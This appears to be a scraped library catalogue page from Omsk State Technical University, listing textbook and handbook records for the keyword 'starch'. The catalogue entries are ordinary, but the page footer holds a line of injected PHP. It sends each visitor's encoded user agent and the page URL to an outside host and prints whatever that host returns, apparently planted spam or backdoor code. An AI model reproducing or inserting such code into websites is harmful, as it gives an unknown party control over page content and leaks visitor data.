Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

128 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КРАХМАЛ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 37
1. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
2. 
Товароведение продовольственных товаров [Текст] : Уч.пособие / Л. А. Боровикова, В. А. Герасимова, А. М. Евдокимов, 1988. - 352 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- ПОЛЕЗНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТИЗАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КЛАССИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ХРАНЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- КОНСЕРВИРОВАНИЕ ПРОДТОВАРОВ -- ПОТЕРИ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ОВОЩИ -- ПЛОДЫ -- ГРИБЫ -- ТОВАРЫ ВКУСОВЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- ТОВАРЫ МОЛОЧНЫЕ -- МЯСО -- ТОВАРЫ РЫБНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- ТОВАРЫ РЫБНЫЕ -- ИКРА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
3. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
4. 
Товароведение зерномучных и кондитерских товаров [Текст] : Учебник гриф-МО / И. П. Салун, Н. А. Смирнова, Е. А. Воробьева, 1981. - 344 с.
Держатели документа (Информация об экземплярах) 
5. 
Товароведение и экспертиза в таможенном деле [Текст] : Учебник в четырех томах. Т. III : Теоретические основы. Продовольственные товары : Учебник / С. Н. Гамидуллаев [и др.], 2010. - 400 с.

В третьем томе учебника изложены нормативно-правовые основы таможенной экспертизы в соответствии с новым Таможенным кодексом таможенного союза. Рассмотрены теоретические основы товароведения и экспертизы продовольственных товаров: зерномучных, свежих и переработанных овощей и плодов, сахара, меда, крахмала, кондитерских и вкусовых товаров.

Учебник предназначен для студентов вузов, изучающих дисциплину «Товароведение и экспертиза в таможенном деле» и обучающихся по специальности «Таможенное дело», а также представляет интерес для всех участников потребительского рынка и внешнеэкономической деятельности.

6. 
Массообменные процессы химической технологии [Текст] : сб. аннот. / Ленингр. техн. ин-т им. Ленсовета. Вып. 2 / под ред. П. Г. Романкова, А. А. Медведева, 1967. - 230, [1] с.
Ключевые слова 
СБОРНИК -- МАССОПЕРЕДАЧА -- ДИФФУЗИЯ -- ПОВЕРХНОСТНОЕ -- ОТЛОЖЕНИЕ -- РЕАКТОР -- ПОРИСТАЯ -- СРЕДА -- ПЕРЕМЕШИВАНИЕ -- ЗЕРНИСТЫЙ -- СЛОЙ -- КАТАЛИЗАТОР -- ТОНКАЯ -- ПЛЕНКА -- АБСОРБЕР -- ВЕНТУРИ -- ДЕСОРБЦИЯ -- БЕНЗОЛ -- ТОЛУОЛ -- БЕНЗИН -- ДВУОКИСЬ -- УГЛЕРОДА -- АЦЕТОН -- БАРБОТАЖНЫЙ -- НАСАДОЧНЫЙ -- СКРУББЕР -- БРЫЗГОУНОС -- РЕКТИФИКАЦИЯ -- ТАРЕЛКА -- ФОРСУНКА -- СУШКА -- КРАХМАЛ -- ИК -- ПОЛИКАПРОЛАКТАМ -- ГЕРМАНИЙ -- АНИОНИТ -- ФУРАН -- ПОЛИЭТИЛЕНОВАЯ -- УГЛЕВОДОРОД -- ЭКСТРАГИРОВАНИЕ -- СПЕК -- АЛЮМИНИЙ -- ДИФФУЗОР -- КРИСТАЛЛИЗАЦИЯ -- РАСТВОРИМОСТЬ -- САХАРОЗА -- ХЕМОСОРБЦИЯ -- ФЕНОЛЯТ -- МЕТАНОЛ -- ПИРРОТИН -- ТРЕЩИНА -- БАРБОТАЖ -- ЭМУЛЬГАТОР -- ДЕФЛЕГМАЦИЯ -- ЭТИЛОВЫЙ -- СПИРТ
7. 
Макаров А. Я. Справочник по строительным материалам [Текст] / А. Я. Макаров, 1963. - 647, [1] с.
Ключевые слова 
АГЛОПОРИТ -- БЕТОН -- АСБЕСТ -- БАЗАЛЬТ -- БИТУМ -- БРИЗОЛ -- БРОНЗА -- БУГЕЛЬ -- ВЕРМИКУЛИТ -- ВОЙЛОК -- ВУЛКАНИТ -- ОГНЕУПОР -- ГЕРАКЛИТ -- ГЛИНА -- ГРАНИТ -- ДЕГОТЬ -- ЖИВИЦА -- ЗАМАЗКА -- ЗОЛА -- КАМЕНЬ -- КАНИФОЛЬ -- КАОЛИН -- КАРТОН -- КВАРЦ -- КВАРЦИТЫ -- КЕРАМЗИТОБЕТОН -- КЕРАМИКА -- КИРПИЧ -- КЛЕЙ -- КОНГЛОМЕРАТ -- КОРУНД -- КРАХМАЛ -- ЛАЗУРЬ -- ЛАК -- ЛАТУНЬ -- МАСТИКА -- МЕРТЕЛЬ -- МОХ -- МРАМОР -- МУСКОВИТ -- НАЖДАК -- НИТРОЛАК -- ПЕНОПОЛИСТИРОЛ -- ПЕМЗА -- ПЕРЛИТ -- ПЕСОК -- ПИРОН -- ПЛАСТИК -- ПЛИТА -- ПОЛИСТИРОЛ -- ПОРТЛАНДЦЕМЕНТ -- ПЕНОПЛАСТ -- ПОТАШ -- ПРИПОЙ -- РАКУШЕЧНИК -- РЕЛИН -- РОМАНЦЕМЕНТ -- РУБЕРОИД -- САЖА -- СИККАТИВ -- СЛАНЕЦ -- СЛЮДА -- СОЛОМА -- СТЕКЛО -- СФАГНУМА -- ТАЛЬК -- ТЕРМОЛИТ -- ТОЛЬ -- ТОМПАК -- ПЕК -- ТРЕПЕЛ -- ТРУБА -- ФАРФОР -- ФЕРРОН -- ФЛЮС -- ЦЕМЕНТ -- ЦЕРЕЗИТ -- ШИФЕР -- ЩЕБЕНЬ -- ШЛАК -- ШПАКЛЕВКА -- ЭЛЕКТРОД -- ЯЧЕИСТЫЕ
Держатели документа (Информация об экземплярах) 
8. 
Унифицированные методы анализа вод [Текст] / ред. Ю. Ю. Лурье, 1973. - 376 с.
Ключевые слова 
ПРОБА -- ТЕМПЕРАТУРА -- ЦВЕТНОСТЬ -- МУТНОСТЬ -- ЗАПАХ -- ВКУС -- ПЛОТНОСТЬ -- ЖЕСТКОСТЬ -- ОКИСЛЯЕМОСТЬ -- УГЛЕРОД -- АММОНИЙ -- АММИАК -- ХЛОР -- ОЗОН -- НИТРАТ -- ХЛОРИД -- ФТОРИД -- ИОДИД -- ДВУОКИСЬ -- СЕРА -- СУЛЬФАТ -- СУЛЬФИД -- СЕРОВОДОРОД -- ФОСФАТ -- ЦИАНИД -- РОДАНИД -- БОРАТ -- СИЛИКАТ -- КАЛЬЦИЙ -- МАГНИЙ -- НАТРИЙ -- КАЛИЙ -- АЛЮМИНИЙ -- ЖЕЛЕЗО -- МАРГАНЕЦ -- МЕДЬ -- СЕРЕБРО -- ЦИНК -- КАДМИЙ -- РТУТЬ -- СВИНЕЦ -- ХРОМ -- НИКЕЛЬ -- МЫШЬЯК -- ФЕНОЛ -- ФОРМАЛЬДЕГИД -- АМИН -- ПИРИДИН -- АРОМАТИЧЕСКИЙ -- УГЛЕВОДОРОД -- ГУМИН -- САХАР -- КРАХМАЛ
Держатели документа (Информация об экземплярах) 
9. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
10. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

11. 
Контроль рабочих свойств полиграфических материалов [Текст] / под ред. А. А. Семионова, 1964. - 486, [1] с.
12. 
Эткинс П. Молекулы [Текст] / П. Эткинс ; пер. с англ. А. А. Кирюшкина, 1991. - 215 с.
Держатели документа (Информация об экземплярах) 
13. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

14. 
Кругляков, Геннадий Николаевич. Товароведение продовольственных товаров [Текст] : Учеб. / Г. Н. Кругляков, Г. В. Круглякова, 2000. - 447 с.
15. 
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.], 2007. - 542, [1] с.

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.

16. 
Сборник работ студенческого научного общества [Текст] : в 2 ч. / Ленингр. технол. ин-т холодил. пром-сти. Ч. 2, 1970. - 100, [1] с.
Держатели документа (Информация об экземплярах) 
17. 
Березин, Борис Иванович. Материаловедение полиграфического производства [Текст] : учеб. для ПТУ / Б. И. Березин, 1972. - 319, [1] с.
Держатели документа (Информация об экземплярах) 
18. 
Унифицированные методы анализа вод [Текст] / под общ. ред. Ю. Ю. Лурье, 1971. - 374, [1] с.
Держатели документа (Информация об экземплярах) 
19. 
Котова, Людмила Николаевна. Полиароматические, гетероциклические соединения. Углеводы и аминокислоты [Текст] : лаб. практикум по орг. химии и основам биохимии / Л. Н. Котова, 2009. - 55 с.
Держатели документа (Информация об экземплярах) 

Представлены основные сведения о химических свойствах, реакционной способности и рассмотрены вопросы ориентации в реакциях электрофильного замещения полиароматических, гетероциклических соединений, а также гетероциклов и углеводов. Приведены задания для самостоятельного решения по изучаемым темам. В частности, разработаны три контрольные работы, каждая из которых содержит по 10 вариантов с 8-10 вопросами: "Многоядерные ароматические соединения", "Гетероциклические соединения", "Углеводы. Аминокислоты, пептиды, белки". Лабораторный практикум предназначен для самостоятельной работы студентов всех специальностей, изучающих органическую химию с основами биохимии.

Полный текст
20. 
Матюхина, Зинаида Петровна. Товароведение пищевых продуктов [Текст] : Учеб. для учеб. заведений нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 1999. - 272 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.83 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;